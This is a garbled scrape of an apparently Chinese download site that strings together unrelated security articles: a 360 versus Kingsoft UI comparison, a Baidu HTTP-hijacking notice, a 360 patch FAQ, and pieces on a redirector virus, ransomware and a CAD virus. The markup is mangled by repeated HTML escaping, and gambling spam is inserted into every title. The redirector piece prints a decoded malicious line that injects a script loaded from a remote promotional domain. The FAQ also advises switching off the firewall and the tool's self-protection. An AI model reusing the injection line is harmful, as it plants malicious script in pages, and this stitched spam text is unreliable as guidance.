class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;471&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/f0b73c83f180496fbf6493f3bb4b29d6_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441451036.jpg" data-rawwidth="471" data-rawheight="185" class="origin_image zh-lightbox-thumb lazy" width="471" data-original="https://pic3.zhimg.com/f0b73c83f180496fbf6493f3bb4b29d6_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441451036.jpg"/><br/></p><p>在进行具体垃圾清理的时候(非一键清理),会有一些类别,比如所上网产生的垃圾,媒体播放产生的垃圾等,这时候如果我想清除windows系统的所有垃圾,那么我只需要<strong>将”windows系统垃圾文件“这个复选框选上就ok,没必要一个一个就行勾选,这样就会减少用户的交互过程,降低用户操作难度</strong>。<strong>由上图可以看出,360在类别前提供复选框,做得非常好,而金山则没有,相对体验较差。</strong></p><p><br/><br/></p><p><strong> &nbsp; &nbsp; &nbsp; &nbsp;四</strong><strong>,一些其他的细节问题</strong></p><p><strong> &nbsp;1,开机加速中的类别问题 &nbsp; &nbsp; &nbsp;</strong><strong> &nbsp; &nbsp;</strong></p><p>360安全卫士的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441462253.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;835&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;294&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;835&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic4.zhimg.com/7b47d612be95f24baa94518075b44af3_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山卫士中的:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441462253.jpg" data-rawwidth="835" data-rawheight="294" class="origin_image zh-lightbox-thumb lazy" width="835" data-original="https://pic4.zhimg.com/7b47d612be95f24baa94518075b44af3_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441462253.jpg"/>金山卫士中的:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441521112.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;838&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;293&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;838&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/ed09676dc9ff605fa8f9b639f150cdba_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441521112.jpg" data-rawwidth="838" data-rawheight="293" class="origin_image zh-lightbox-thumb lazy" width="838" data-original="https://pic3.zhimg.com/ed09676dc9ff605fa8f9b639f150cdba_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441521112.jpg"/><br/></p><p>可以看出,在开机加速的软件中中,360安全卫士只是没规则的罗列,而金山则是按照类别进行分类的。那么这有什么好处呢?举个例子,比如我设置开机启动项时,我只希望开一些系统的软件,然后开一个聊天工具,其他的影音播放什么的软件通通关掉。那么这时候分类的作用就大了,让用户通过类别能进行快速的操作,这一点金山做的要好,360相对较差。</p><p><strong>金山的分类机制能够引导用户进行快速操作,如果在类别前加上复选框对类别直接操作就更方便了,相对于金山,360的无头绪罗列会让人感到很混乱。</strong></p><p><br/></p><p><strong>2,功能大全里“全部页面的”元素呈现方式</strong></p><p>360安全卫士:<noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441532329.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;849&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;371&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;849&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic2.zhimg.com/b9b925084cdde4bb90797cf75d9aa645_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;金山卫士的:</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441532329.jpg" data-rawwidth="849" data-rawheight="371" class="origin_image zh-lightbox-thumb lazy" width="849" data-original="https://pic2.zhimg.com/b9b925084cdde4bb90797cf75d9aa645_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441532329.jpg"/>金山卫士的:<br/><noscript>&amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;quot;http://pic.cr173.com/up/2017-2/2017021718441591350.jpg&amp;amp;amp;amp;amp;amp;quot; data-rawwidth=&amp;amp;amp;amp;amp;amp;quot;837&amp;amp;amp;amp;amp;amp;quot; data-rawheight=&amp;amp;amp;amp;amp;amp;quot;386&amp;amp;amp;amp;amp;amp;quot; class=&amp;amp;amp;amp;amp;amp;quot;origin_image zh-lightbox-thumb&amp;amp;amp;amp;amp;amp;quot; width=&amp;amp;amp;amp;amp;amp;quot;837&amp;amp;amp;amp;amp;amp;quot; data-original=&amp;amp;amp;amp;amp;amp;quot;https://pic3.zhimg.com/797d6dce55112a794e01066a538cf37e_r.jpg&amp;amp;amp;amp;amp;amp;quot;&amp;amp;amp;amp;amp;amp;amp;amp;gt;</noscript><img src="https://pic.cr173.com/up/2017-2/2017021718441591350.jpg" data-rawwidth="837" data-rawheight="386" class="origin_image zh-lightbox-thumb lazy" width="837" data-original="https://pic3.zhimg.com/797d6dce55112a794e01066a538cf37e_r.jpg" data-actualsrc="http://pic.cr173.com/up/2017-2/2017021718441591350.jpg"/><br/></p><p><strong>360安全卫士的元素呈现方式是在页面右侧加滚动条来实现的,而金山卫士则是通过页面的左右切换来实现的,个人更认同360安全卫士的,因为一般来讲交互中要尽量的减少视觉变换。、</strong><br/> </p><p><br/></p><p><strong>总结:本文在一些交互细节方面的设计对360安全卫士和金山卫士两个产品进行了比较性分析。两个产品在设计中各有优劣,很多方面运用了一些很好的交互设计技巧。总体来讲,360安全卫士在交互设计的各个方面能更好地去引导用户,给用户带来良好的用户体验,但也有不足之处;相比之下,金山卫士在设计中有很多不足,但也有亮点。本文本着产品人对产品的态度进行分析,如能帮助两个产品在用户体验方面有所改进,欣喜不已。</strong></p><p><strong><br/></strong></p><p><br/></p> [网络安全]百度安全检测提示您的网络环境极有可能性已被劫持是什么回事 怎么解决-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/118015_1.html 西西 网络安全 2016/11/25 14:09:39 <p>近日很多网民用户用百度搜索的时候出现了‘您的网络环境极有可能性已被劫持’这种现象,无论是用的谷歌浏览器还是IE浏览器还是360浏览器都出现了这种情况,那么到底是怎么回事呢,会不会是电脑中毒了?让很多网友很是不安,想知道最正确的答案,下面西西为大家讲解一下!</p><p><img src="https://pic.cr173.com/up/2016-11/2016112514174035887.png"/></p><h3>劫持问题说明:</h3><p><span style="color: rgb(255, 0, 0);"><strong>一、什么是http劫持?</strong></span></p><p>通常您使用http访问百度的过程中,由于没有采用https安全访问模式,访问中可能会被运营劫持到您的请求信息并加以篡改,例如:窃取您的隐私(劫持方会窃取您的电话信息、搜索结果等,)、设置弹窗广告、篡改您的http访问信息(访问地址会带有tn小尾巴)、以及伪装百度结果页,极大的影响您正常访问百度服务。</p><p><strong><span style="color: rgb(112, 48, 160);">常见的具体表现,但不仅限于情形:</span></strong></p><p>1)搜索结果页的链接中,“异常”展现了tn数字后缀。例如在百度首页进行搜索时,展现的结果页地址链接为:<a href="http://www.baidu.com/s?&wd=hao123&tn=92078526_hao_pg(正常情况下应该是http://www.baidu.com/s?&wd=hao123)" _src="http://www.baidu.com/s?&wd=hao123&tn=92078526_hao_pg(正常情况下应该是http://www.baidu.com/s?&wd=hao123)">http://www.baidu.com/s?&amp;wd=hao123&amp;tn=92078526_hao_pg(正常情况下应该是http://www.baidu.com/s?&amp;wd=hao123)</a></p><p>2)进行搜索时,无论搜索的搜索词是什么,搜索结果页都会展现【{WD}】、【${arg_wd}】的搜索结果。例如这个搜索结果;</p><p>3)搜索结果页面无限自动重复刷新,看不到搜索内容;</p><p>4)输入带有空格的搜索词后,搜索结果页上的关键词中,“空格”变成了“+”号。例如这个搜索结果;</p><p>5)搜索结果页展示乱码,例如这个搜索结果;</p><p>6)输入搜索词点击搜索后,自动搜索之前搜索过的搜索词结果,或其他不相关的搜索词结果;</p><p>7)输入搜索词点击搜索后,网页显示报错信息“网页定向重复”;</p><p>8)输入搜索词点击搜索后,自动跳回百度首页;</p><p>9)输入搜索词点击搜索后,自动跳转到搜狗搜索页面,或其他搜索引擎的结果;</p><p>10)地址栏输入<a href="http://www.baidu.com/" _src="http://www.baidu.com/">http://www.baidu.com/</a><span style="line-height: 1em;">但是打开的页面却是类似<a href="http://www.baidu.com/?tn=SE_hldp00512_huttpmkq" _src="http://www.baidu.com/?tn=SE_hldp00512_huttpmkq">http://www.baidu.com/?tn=SE_hldp00512_huttpmkq</a></span><span style="line-height: 1em;">的结果。</span></p><p><span style="color: rgb(255, 0, 0);"><strong>二、如何避免被劫持?</strong></span></p><p>1.建议您尝试加密连接https://www.baidu.com进行搜索,看看问题是否依然存在?需要注意的是,如果您的IE浏览器是8.0以下版本或使用了其他浏览器的兼容模式(如360浏览器的兼容模式),是无法通过https加密链接使用百度服务的。我们强烈建议您升级ie浏览器至8.0以上版本或切换到其他浏览器的极速模式。</p><p>2.如果您使用了高版本浏览器非兼容模式,建议你直接通过<a href="https://www.baidu.com" _src="https://www.baidu.com">https://www.baidu.com</a><span style="line-height: 1em;">访问百度。同时我们建议您将上述页面设置为浏览器首页,根据我们的测试,这可以有效解决绝大部分的网络劫持问题,设置方法:<a href="https://www.baidu.com/cache/sethelp/help.html。" _src="https://www.baidu.com/cache/sethelp/help.html。">https://www.baidu.com/cache/sethelp/help.html。</a></span></p><p>3.请查看一下百度网页搜索的地址中,是否有tn=xxxx一串数字的后缀。如果有,烦您请发给我们,我们的工程师团队会进行详尽的分析和跟进。搜索结果显示异常反馈页面地址:<a href="http://f3.baidu.com/index.php/feedback/tools/fb" _src="http://f3.baidu.com/index.php/feedback/tools/fb">http://f3.baidu.com/index.php/feedback/tools/fb</a></p><p>三、如果问题依旧无法避免,你可以尝试到网信办投诉页面下进行投诉:</p><p><a href="http://www.chinatcc.gov.cn:8080/cms/shensus/" _src="http://www.chinatcc.gov.cn:8080/cms/shensus/">http://www.chinatcc.gov.cn:8080/cms/shensus/</a></p> [安全产品]360安全卫士常见漏洞修复问题有哪些 最新360漏洞修复常见问题整理-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/109790_1.html 西西 安全产品 2016/10/8 14:10:30 <p><span style="line-height: 0px;"></span>不少小伙伴在进行360安全卫士的时候,会出现各种问题,其中最为主要的就是漏洞修复问题,不知道该怎么办,因此小编在这里给大家讲讲。</p><p align="center"><img src="https://pic.cr173.com/up/2016-10/14759072172853361.png" title="截图14.png"/></p><p>360安全卫士西西专区:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全卫士2016最新版:<a href="http://www.pjyuanjian.com/soft/3188.html" target="_blank">http://www.pjyuanjian.com/soft/3188.html</a></p><p>360手机助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a></p><p><strong>漏洞修复常见问题整理介绍</strong></p><p>1.补丁安装失败</p><p>(1)鼠标右键单击桌面的360图标→选择“属性”→在快捷方式选项下点击“打开文件位置”→双击打开hotfix文件夹→找到对应的补丁安装包后,双击进行安装,如有弹出报错,则发送安装失败的具体报错的截图或文字。</p><p>(2)360安装目录下hotfix文件夹里,双击对应下载的补丁提示:不是有效的win32应用程序。</p><p>打开360漏洞修复界面,点击右上角的“设置”,然后点击补丁保存设置里的“打开目录”,找到对应的补丁安装包,双击进行安装</p><p>a.下载补丁时数据不完整或损坏导致。</p><p>b.建议手动使用迅雷等下载工具下载安装:点击360扫描的漏洞后,360右侧显示的详细信息里,有此补丁的下载链接。</p><p>2.下载失败</p><p>(1)下载补丁时数据不完整,建议重新下载</p><p>(2)同一时段补丁下载请求过大,导致微软的服务器压力大,建议更换时段再重新下载。</p><p>(3)可能防火墙和杀毒软件的设置影响到下载,建议重新修改防火墙和杀毒软件的相关设置,后再下载此补丁</p><p>(4)使用代理服务器连接微软或本地服务器相当的不稳定,建议尽量不要使用代理服务器后,再进行漏洞补丁下载。</p><p>(5)您可以选中一个补丁,在右侧显示的详细信息里,有此补丁的下载链接,建议手动点击官方下载,使用下载工具下载到本地后手动安装。</p><p>另:鼠标右键单击桌面的360图标,选择属性,点击“查找目标位置”后,找到360leakfixer.leakrepair.som.log文件,以及下载log,然后上传。(一般补丁日时采用此方法,来查看下载日志,以便分析原因)。</p><p>3.反复扫描出补丁</p><p>(1)请检查用户是否安装了还原类软件,如PC保鲜盒、雨过天晴等;如果有安装,请设置在打补丁之后再创建还原点</p><p>(2)尝试手动安装此补丁,是否会出现任何报错提示:在360安装目录下的的hotfix文件夹里, 双击对应下载的补丁</p><p>(3)可以先关闭卫士的自我保护,把leakrepaid.dat文件删除-&gt;忽略补丁-&gt;关闭卫士-&gt;再体检(不要修复完漏洞就体检,容易造成反复)</p><p>(4)查看补丁扫描条件,看是否是某个组件限制或其他原因,文件升不上来</p><p>(5)打开360主界面:修复漏洞----查看并修复漏洞---勾选不能修复的漏洞名称----忽略选中漏洞</p><p>4.使用360安全卫士扫描漏洞时,提示:数据文件丢失,无法进行扫描,并且360界面右侧官方日志无法显示</p><p>(1)在“开始”——“运行”中输入“regsvr32 &nbsp;msxml3.dll”,重新注册一下xml文件即可。</p><p>(2)如重新注册xml方法不能正常,请关闭您正在使用的防火墙后再进行注册。</p><p>(3)关闭防火墙之后再安装360安全卫士,重新检测。</p><p>5.安装补丁提示:此补丁系统找不到指定的路径。</p><p>(1)设置文件属性:打开系统盘,左上方的工具选项----文件夹选项----查看----把“隐藏受保护的操作系统文件(推荐)”的勾去掉----选择显示所有文件和文件夹。</p><p>(2)将WINDOWS下$hf_mig$(隐藏文件夹)这个文件夹删除。</p><p>(3)重启电脑后,继续使用360安装补丁。</p><p>6.不能访问Windows Installer服务.可能是您在安全模式下运行Windows或Windows Installer没有正确的安装</p><p>(1)点击桌面开始——运行——输入services.msc——找到windows installer——右键——属性——启动类型设为自动</p><p>(2)曾安装过ACDSee5.0(包括迷你中文版),卸载它。如果还不行就重装Windows Installer 或者ACDSee 4.0</p><p>(3)控制面板你—添加删除程序--再次安装windows installer2.0,运行instmsiw.exe如果说\服务已经安装\然后直接退出安装就再跟着做,否则你重装就OK了</p><p>(4)删除注册表中的</p><p>[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\MSIServer]</p><p>然后运行instmsiw.exe</p><p>7.安装程序遇到了一个错误: &nbsp;您没有许可来更新 Windows XP</p><p>(1)以系统管理员身份登录,在CMD下运行命令:</p><p>secedit /configure /cfg%windir%\\repair\\secsetup.inf /db secsetup.sdb /verbose</p><p>(2)然后在输入:gpupdate 来刷新组策略。</p><p>(3)如果没有即时生效,重启下电脑。</p><p>8. 蓝屏问题</p><p>可以将c:\\windows\\minidump文件夹压缩上传,以便我们进一步分析蓝屏的原因。</p><p>具体操作如下:请打开鼠标右键“我的电脑”-属性-高级-启动和故障恢复,按下图进行设置,再次蓝屏后即会在c:\\windows\\下出现minidump文件,请将minidump文件压缩后发送,</p><p>9. 卸载补丁的方法</p><p>(1)可以通过控制面板——添加/删除程序——显示更新,找到对应的补丁,右键卸载。</p><p>(2)使用每个月提供的,补丁卸载工具</p><p>(3)针对某个KB号,自行编辑卸载工具中的config文件</p><p>10. 智能忽略</p><p>说明此补丁不适合当前的系统安装,可以直接忽略。</p><p>11. office2003补丁安装失败,手动安装提示“系统无法应用此补丁”、“找不到系统所需版本”</p><p>建议您临时忽略不能修复的漏洞,方法如下:打开360主界面:修复漏洞----查看并修复漏洞---勾选不能修复的漏洞名称----忽略选中漏洞</p><p>office2003如果是精简版(ghost系统自带),缺失部分组件可能导致安装失败。可以重新安装office 2003sp3的升级包,或者安装完整版office,再尝试运行漏洞修复打补丁。</p><p>12. 关于U盘的补丁KB971029</p><p>答:此补丁只是关闭了U盘的“自动运行”(AutoRun)功能,为了防止用户在接入usb设备时,不经意中自动运行了usb外接设备中的木马,病毒等问题。</p><p>而在“我的电脑”界面中,仍会显示外接设备的图标,不影响用户使用usb外接设备。</p><p>13.补丁安装时间比较长</p><p>(如.NET补丁,但是.NET补丁的安装不影响它的下次安装)</p><p>如果已经关掉了漏洞修复的程序,您可以再运行,看是否还有提示有此高危漏洞。或者可以手动打开补丁下载路径,双击运行此补丁包,看是否能顺利安装。</p><p>如果出现报错,可以将截图发至论坛。</p><p>14.关于打上.net补丁后mscorsvw.exe狂占CPU的问题</p><p>微软的MSDN博客曾做过以下解释:</p><p>mscorsvw.exe在后台预编译.NET集合。一旦完成这个工作,它就退出了。典型地,你安装了.NET系统核心文件后,它将被处理高优先级的集合5到10分钟,然后直到系统闲置后才处理低优先级的集合。一旦mscorsvw.exe完成以上工作后,将自动关闭,你不会再看到该进程。一个重要的事情是一个低优先级的进程编译时,你可能看到100%CPU占用,因此它不会尝试侵占正在运行的其他的进程的资源。一旦该编译完成,集合将可以通过不同的进程共享页面,热启动将典型地更快速。</p><p>建议安装.NETFramework的补丁过程比较耗时,请用户耐心等待。</p><p>如果安装结束后仍出现电脑比较卡,CPU使用率较高等问题,也请按照提示重启电脑。另外,可以通过关闭服务可以关闭这个程序。</p><p>桌面右键单击我的电脑/计算机,选择“管理”——“服务和应用程序”,Microsoft .NET Runtime Optimization Service是.NET运行优化服务进程,关掉这个服务就可以了。</p><p>以上为本期小编给大家提供的漏洞修复相关问题的解决方案,想要知道更多请关注我们。</p> [防护教程]中了js.url.redirector.d / js.url.redirector.e 病毒怎么办 中了js.url.redirector.d / js.url.redirector.e 病毒解决办法-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/109270_1.html 西西 防护教程 2016/9/29 17:46:41 <p><strong>中了js.url.redirector.d / js.url.redirector.e 病毒怎么办,中了js.url.redirector.d / js.url.redirector.e 病毒解决办法。</strong>不少小伙伴反应自己的电脑中了js.url.redirector.d / js.url.redirector.e 病毒,不知道该怎么办,那么今天小编给大家讲讲该如何应对。</p><p>360安全卫士西西专区:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全卫士2016最新版:<a href="http://www.pjyuanjian.com/soft/3188.html" target="_blank">http://www.pjyuanjian.com/soft/3188.html</a></p><p>360手机助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a> </p><p><strong style="white-space: normal;">中了js.url.redirector.d / js.url.redirector.e 病毒解决办法</strong></p><p>一、中毒现象:</p><p>360杀毒实时监控总是提示发现病毒并成功删除</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14751435672728254.png"/></p><p>此类恶意文件主要存在于如下类似路径:</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14751435803942655.png"/></p><p>二、中的是什么毒</p><p>js.url.redirector.d/e病毒文件通常是:</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14751436254919477.png"/></p><p>这是一段 javascript 代码,被加密了,解密后的内容,在末尾有如下代码</p><p>document.write(&quot;&lt;scriptsrc=&#39;http://run.suobianyu.com/a.js&#39;&gt;&lt;\/script&gt;&quot;);</p><p>其中的网址 http://run.suobianyu.com/a.js 是恶意推广链接</p><p>三、为什么中毒</p><p>由于被访问的网站带有这些url后缀,在浏览网页(如视频 、音乐等网站)时,保存在IE临时缓存目录中的文件存在如上恶意代码,所以被360杀毒监控报出,弹窗提醒。</p><p>四、我该怎么做</p><p>1、 此病毒危害不大,主要目的是推广。遇到此情况可直接选择【处理】。建议勾选【自动处理不再提示】。</p><p>2、 此病毒杀掉一次后,下次浏览网页可能会再次出现,产生的打扰比较多,目前360杀毒正在考虑新的解决方案,减少打扰。</p> [病毒漏洞]中了敲诈者病毒怎么办,中了敲诈者病毒有什么解决办法-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/108687_1.html 西西 病毒漏洞 2016/9/26 16:44:23 <p><strong><span style="line-height: 0px;"></span>中了敲诈者病毒怎么办,中了敲诈者病毒有什么解决办法</strong>。发生这种状况的时候,很多人都很恐慌,一而再再而三的中了这样的病毒欲哭无泪,因此在这里,小编教大家解决的好办法。</p><p>360安全卫士西西专区:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全卫士2016最新版:<a href="http://www.pjyuanjian.com/soft/3188.html" target="_blank">http://www.pjyuanjian.com/soft/3188.html</a></p><p>360手机助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a></p><p>今年以来,敲诈者病毒呈现高发态势,360互联网安全中心监测到,仅上半年,共截获电脑端新增敲诈者病毒变种74种,涉及PE样本40000多个,涉及非PE文件10000多个,全国至少有580000多台用户电脑遭到了敲诈者病毒攻击,且有多达50000多台电脑最终感染敲诈者病毒,平均每天有约300台国内电脑感染敲诈者木马。</p><p>网络安全机构监测发现,敲诈者病毒正大量利用网页挂马、钓鱼邮件这两种方式传播。由于这种病毒有经济上的利益,因此它们的更新速度特别快。如果不慎打开带有病毒网页或者邮件附件,病毒就会入侵用户电脑系统,强行加密磁盘中的文档。</p><p>文档一打开就酱紫,全是乱码,哭~~~~~</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748798146851423.png"/></p><p>这是一封信,但是他不是普通的信,他是一封 勒!索!信!</p><p>还有繁体中文、英文等不同版本:</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748799537092710.png"/></p><p style="text-align: center;">图:攻击者留下的勒索信(英文版)</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748799698303541.png"/></p><p style="text-align: center;">图:攻击者留下的勒索信(繁文版)</p><p>更是狮子大开口,上来就要比特币,还威胁必须在几十小时内完成支付,我的天哪~~~~</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748799971680982.png"/></p><p style="text-align: center;">图:根据敲诈者病毒提示找到付费页面</p><p>另外,攻击者还利用部分网站漏洞(包括游戏、新闻等主流网站),把恶意脚本植入网页中,当有人访问带有恶意代码的网页时,电脑就会自动下载并执行病毒。如果电脑感染敲诈者病毒,文档资料会被病毒进行高强度加密。</p><p>由于它们主要采用不对称加密的方式对系统中的特定文件进行高强度加密,使受害者完全不可能在不支付赎金的情况下自行解密被加密的文件。并且加密具有极高的安全性,如果没有病毒制作者手里的密钥,那么根本无法恢复原文件。因为如果要破解加密的话,普通电脑花几万年时间也不够。更恶毒的是,攻击者只会给受害者留下几十个小时的思考时间,一旦过期没有付钱,就会销毁密钥,让用户的资料彻底烟消云散。</p><h3><strong>目前,360国内首家推出了360反勒索服务</strong></h3><p>针对目前流行的使用非对称加密的特定木马家族,提供文档还原解密服务。</p><p>为您服务的可都是360顶级的反病毒专家,牛不牛吧</p><p>那还不快来开启服务,拯救您的文档,就在此刻</p><p>只要下载安装最新安全卫士11.0Beta版,点击主界面中 “反勒索服务”</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748800501132764.png"/></p><p>在界面中,开启反勒索服务。开启成功后,若您不幸遭遇敲诈者木马,同时360未及时给您进行风险提示,360将帮您支付最高3比特币的赎金,并全力帮您恢复被加密文档</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748800964285291.png"/></p> [防护教程]电脑中了ABCD木马病毒怎么办 关于ABCD病毒的那些你不知道的事-啊彩彩票,万博彩票,1分11选5,瑞祥祥云app http://www.pjyuanjian.com//html/108672_1.html 西西 防护教程 2016/9/26 16:05:38 <p><strong>电脑中了ABCD木马病毒怎么办,关于ABCD病毒的那些你不知道的事。</strong>这是很多人在发现自己的电脑中这样的病毒之后很烦恼的事情,不知道该用什么办法来解决,在这里小编给大家介绍一下解决的办法。</p><p>360安全卫士西西专区:<a href="http://m.cr173.com/k/360safe" target="_blank">http://m.cr173.com/k/360safe</a></p><p>360安全卫士2016最新版:<a href="http://www.pjyuanjian.com/soft/3188.html" target="_blank">http://www.pjyuanjian.com/soft/3188.html</a></p><p>360手机助手2016版:<a href="http://m.cr173.com/x/41712" target="_blank">http://m.cr173.com/x/41712</a></p><p>如果您遇到以下所述的任何一个或者类似的场景,那么,您极有可能遇到了acad 病毒。</p><p>“ 360 总是能扫描到病毒,名字为 &nbsp;virus.acad.bursted.b2 (病毒名字不固定,但是有 acad 这个关键字),即使我全盘扫描,全部处理,重启计算机后,还是如此报很多病毒。”</p><p>“每次打开图纸,都会在图纸目录生成一个 acad.fas &nbsp;文件,好像是这个文件还是隐藏的。”</p><p>“每次打开 cad 程序,都是响应很慢,会生成一个名字叫 acaddoc.lsp 的文件。”</p><p>“打开 cad 图纸时,会自动打开浏览器。”</p><p>以往遇到 acad 病毒的用户都是这样反馈的:</p><p>【virus.acad.bursted.b2 CAD病毒360杀不掉 每次重启都有会出现】</p><p><a href="http://bbs.#/thread-6900151-1-1.html" _src="http://bbs.#/thread-6900151-1-1.html">http://bbs.#/thread-6900151-1-1.html</a></p><p>【每次打开CAD都是无法响应,之后就出现acaddoc这个文件】</p><p><a href="http://bbs.#/thread-14378042-1-1.html" _src="http://bbs.#/thread-14378042-1-1.html">http://bbs.#/thread-14378042-1-1.html</a></p><p>【CAD病毒 每次都打开都显示 强力杀毒还没有】</p><p><a href="http://bbs.#/thread-7015019-1-1.html" _src="http://bbs.#/thread-7015019-1-1.html">http://bbs.#/thread-7015019-1-1.html</a></p><p>【cad.fas病毒无法彻底清除】</p><p>http://bbs.#/thread-6894952-1-1.html</p><h3><strong>我遇到的是什么病毒,有何危害?</strong></h3><p>这是 acad 类病毒。危害可能(但不限于)有:</p><p>&nbsp; a) &nbsp;偷取您的 cad 图纸文件,通过网络上传;</p><p>&nbsp; b) &nbsp;恶意自动打开浏览器,访问指定网站,赚取流量;</p><p>&nbsp; c) &nbsp;后台下载有害的可执行程序</p><h3><strong>为什么查杀很多次,还是查杀不干净?</strong></h3><p>1、 &nbsp;acad 病毒具有强感染性,很类似宏病毒。</p><p>2、 &nbsp;宏病毒的感染过程是,在您的计算机无病毒的情况下,如果从外界复制了一个带有感染型的 doc 文档,那么,在您打开该病毒文档的同时,它就去感染了您的文档模板,使您的文档模板也会带有此病毒。因 office 软件存在一个运行机理,在您打开一个文档时,会自动加载文档模板,导致,您在打开一个没有病毒的文档时,加载了有病毒的文档模板,之后该无病毒的文档也会被感染病毒。</p><p>3、 &nbsp;同宏病毒的感染过程,在您的计算机无病毒的情况下,如果从外界复制一个带有 acad &nbsp;病毒的图纸目录,那么在您打开该图纸文件的同时,病毒会随着 acad 程序的运行而被加载起来,进而感染到您的 acad 程序目录。在您打开一个没有病毒的 acad &nbsp;图纸时,刚刚被感染到的 acad 程序目录中的病毒同样会被加载起来,感染到您当前这个没有病毒的 acad 图纸目录。如此完成了病毒的感染过程。</p><p>4、 &nbsp;但是, acad 病毒比宏病毒更复杂,复杂之处在于 acad 病毒的文件类型比较多,难以查杀干净。</p><h3><strong>我中了acad病毒,我该怎么做?</strong></h3><p>1、在遇到宏病毒时,因可能存在感染性质,我们通常会使用 360 杀毒的【宏病毒扫描】,此功能会全盘扫描计算机的文档文件。</p><p>2、宏病毒需要全盘扫描查杀, acad &nbsp;病毒因具有同样的感染性质,因此也需要全盘扫描查杀, 360 没有独立的 acad 扫描功能,需要手动点击【全盘扫描】,同时开启 Bitdefender 引擎,扫描全盘的所有文件。</p><p align="center"><img src="https://pic.cr173.com/up/2016-9/14748780723997449.png" title="t01835028ab8a7e232e.png"/></p><p></p><p>3、我全盘扫描了,也打开了 Bitdefender 引擎,但依旧存在病毒?这种情况,就需要 360 的技术人员来远程帮助您了。</p><p>因此,如果您要发帖,最好能留下联系方式,如果不留联系方式, 360 还是需要联系您,这样会耽误彼此时间,如果不想发帖,也可以私信发给 360 的员工。</p><p>我是 acad 重度使用用户,我需要对杀毒软件做针对性的配置优化吗?</p><h3><strong>可以做针对性的优化,包括的优化措施有:</strong></h3><p>a) 打开 Bitdefender 引擎 ;</p><p>b) 